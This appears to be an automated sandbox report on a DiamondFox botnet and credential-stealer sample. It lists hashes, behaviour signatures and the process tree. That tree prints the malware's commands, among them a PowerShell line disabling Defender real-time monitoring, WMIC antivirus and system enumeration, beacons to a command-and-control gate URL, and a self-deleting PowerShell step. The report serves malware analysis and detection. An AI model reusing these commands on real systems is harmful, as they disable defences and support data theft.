Overview

overview

10

Static

static

10

2d64df6be5...15.exe

windows7_x64

10

2d64df6be5...15.exe

windows10_x64

10

Analysis

  • max time kernel
    133s
  • max time network
    164s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    04/07/2021, 12:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe

  • Size

    203KB

  • MD5

    a1e165e1926c0c83123c89fce6b1af56

  • SHA1

    281246ba4b852a5f62e032424f7816f5a6b0406f

  • SHA256

    2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

  • SHA512

    28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Score
10/10
diamondfoxbotnetdiscoveryspywarestealer

Malware Config

Signatures

  • DiamondFox

    DiamondFox is a multipurpose botnet with many capabilities.

    botnetstealerdiamondfox
  • DiamondFox payload 18 IoCs

    Detects DiamondFox payload in file/memory.

  • NirSoft MailPassView 3 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 3 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 8 IoCs
  • Executes dropped EXE 10 IoCs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 7 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe
    "C:\Users\Admin\AppData\Local\Temp\2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1036
    • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
      "C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:316
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 1
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1612
      • C:\Windows\SysWOW64\Wbem\wmic.exe
        "wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:288
      • C:\Windows\SysWOW64\Wbem\wmic.exe
        "wmic" os get caption /FORMAT:List
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1336
      • C:\Windows\SysWOW64\Wbem\wmic.exe
        "wmic" path win32_VideoController get caption /FORMAT:List
        3⤵
          PID:756
        • C:\Windows\SysWOW64\Wbem\wmic.exe
          "wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List
          3⤵
            PID:1348
          • C:\Windows\SysWOW64\Wbem\wmic.exe
            "wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List
            3⤵
              PID:332
            • C:\Windows\SysWOW64\Wbem\wmic.exe
              "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
              3⤵
                PID:960
              • C:\Windows\SysWOW64\Wbem\wmic.exe
                "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
                3⤵
                  PID:1812
                • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                  /scomma "C:\Users\Admin\AppData\Local\Temp\1.log"
                  3⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  PID:836
                • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                  /scomma "C:\Users\Admin\AppData\Local\Temp\4.log"
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  PID:2032
                • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                  /scomma "C:\Users\Admin\AppData\Local\Temp\2.log"
                  3⤵
                  • Executes dropped EXE
                  PID:1596
                • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                  /scomma "C:\Users\Admin\AppData\Local\Temp\3.log"
                  3⤵
                  • Executes dropped EXE
                  PID:976
                • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                  X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
                  3⤵
                  • Executes dropped EXE
                  PID:956
                  • C:\Windows\notepad.exe
                    X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                    4⤵
                    • Opens file in notepad (likely ransom note)
                    PID:1636
                  • C:\Windows\write.exe
                    X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                    4⤵
                      PID:1516
                  • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                    X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of SetWindowsHookEx
                    PID:540
                  • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                    X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of SetWindowsHookEx
                    PID:1776
                  • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                    X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
                    3⤵
                    • Executes dropped EXE
                    PID:1500
                  • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                    X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
                    3⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1148
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 1148 -s 276
                      4⤵
                      • Loads dropped DLL
                      • Program crash
                      • Suspicious behavior: EnumeratesProcesses
                      PID:548
                  • C:\Windows\SysWOW64\Wbem\wmic.exe
                    "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
                    3⤵
                      PID:844
                    • C:\Windows\SysWOW64\Wbem\wmic.exe
                      "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
                      3⤵
                        PID:1832
                      • C:\Windows\SysWOW64\Wbem\wmic.exe
                        "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
                        3⤵
                          PID:1060
                        • C:\Windows\SysWOW64\Wbem\wmic.exe
                          "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
                          3⤵
                            PID:804
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "powershell" Start-Sleep -s 10; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe' -Force -Recurse
                          2⤵
                          • Deletes itself
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1660

                      Network

                      MITRE ATT&CK Enterprise v6

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • memory/540-167-0x0000000000400000-0x0000000000405000-memory.dmp

                        Filesize

                        20KB

                        Download

                      • memory/540-159-0x0000000000400000-0x0000000000405000-memory.dmp

                        Filesize

                        20KB

                        Download

                      • memory/548-190-0x00000000006F0000-0x00000000006F1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/836-134-0x0000000000400000-0x000000000047C000-memory.dmp

                        Filesize

                        496KB

                        Download

                      • memory/836-138-0x0000000000400000-0x000000000047C000-memory.dmp

                        Filesize

                        496KB

                        Download

                      • memory/956-156-0x0000000000400000-0x0000000000413000-memory.dmp

                        Filesize

                        76KB

                        Download

                      • memory/956-166-0x0000000000400000-0x0000000000413000-memory.dmp

                        Filesize

                        76KB

                        Download

                      • memory/976-155-0x0000000000400000-0x0000000000455000-memory.dmp

                        Filesize

                        340KB

                        Download

                      • memory/976-151-0x0000000000400000-0x0000000000455000-memory.dmp

                        Filesize

                        340KB

                        Download

                      • memory/1036-59-0x0000000075721000-0x0000000075723000-memory.dmp

                        Filesize

                        8KB

                        Download

                      • memory/1148-184-0x0000000000400000-0x000000000040E000-memory.dmp

                        Filesize

                        56KB

                        Download

                      • memory/1500-178-0x0000000000400000-0x0000000000431000-memory.dmp

                        Filesize

                        196KB

                        Download

                      • memory/1500-173-0x0000000000400000-0x0000000000431000-memory.dmp

                        Filesize

                        196KB

                        Download

                      • memory/1596-146-0x0000000000400000-0x0000000000422000-memory.dmp

                        Filesize

                        136KB

                        Download

                      • memory/1596-150-0x0000000000400000-0x0000000000422000-memory.dmp

                        Filesize

                        136KB

                        Download

                      • memory/1612-97-0x0000000006080000-0x0000000006081000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1612-81-0x0000000002490000-0x0000000002491000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1612-69-0x0000000001F10000-0x0000000001F11000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1612-76-0x00000000020D0000-0x0000000002D1A000-memory.dmp

                        Filesize

                        12.3MB

                        Download

                      • memory/1612-85-0x0000000005240000-0x0000000005241000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1612-92-0x0000000005FE0000-0x0000000005FE1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1612-98-0x0000000006190000-0x0000000006191000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1612-129-0x0000000006310000-0x0000000006311000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1612-105-0x000000007EF30000-0x000000007EF31000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1612-128-0x0000000006300000-0x0000000006301000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1612-113-0x0000000006110000-0x0000000006111000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1612-106-0x0000000006240000-0x0000000006241000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1660-133-0x00000000060A0000-0x00000000060A1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1660-145-0x0000000006170000-0x0000000006171000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1660-71-0x00000000046E0000-0x00000000046E1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1776-177-0x0000000000400000-0x0000000000406000-memory.dmp

                        Filesize

                        24KB

                        Download

                      • memory/1776-168-0x0000000000400000-0x0000000000406000-memory.dmp

                        Filesize

                        24KB

                        Download

                      • memory/2032-139-0x0000000000400000-0x0000000000405000-memory.dmp

                        Filesize

                        20KB

                        Download

                      • memory/2032-144-0x0000000000400000-0x0000000000405000-memory.dmp

                        Filesize

                        20KB

                        Download